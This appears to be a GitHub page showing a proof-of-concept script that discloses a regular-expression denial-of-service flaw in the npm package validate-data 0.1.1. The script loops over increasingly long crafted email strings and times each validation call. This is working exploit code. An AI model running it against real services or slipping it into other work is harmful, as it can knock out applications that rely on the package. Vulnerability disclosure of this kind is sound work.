-
-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathvalidate-data.js
51 lines (45 loc) · 1.25 KB
/
validate-data.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
/**
* validate-data@0.1.1
* Package Manager: npm
* Link to published package: https://github.com/exp-anoop/validate-data
* Link to GitHub repo: https://github.com/exp-anoop/validate-data
* Severity level: High
* Module Description: NodeJs backend library for validate data against the rules provided.
* Additional Info: It allows cause a denial of service when validating crafted invalid emails.
* Contacted maintainer?: No
* Open issue?: No
*/
const validate = require('validate-data');
function build_blank(n) {
var ret = ""
for (var i = 0; i < n; i++) {
ret += "a"
}
return ret + "!";
}
// Validation rules
const rules = {
required: "email name age",
email: "email",
string: "email name",
number: "age",
array: "options",
boolean: "status"
};
for(var i = 1; i <= 5000000; i++) {
var time = Date.now();
var attack_str = build_blank(i)
// Data to be validated
const data = {
email: attack_str,
name: "John",
age: 25,
options: [1,2,3],
status: true
};
// Using the package
let error = validate(data, rules);
console.log(error);
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}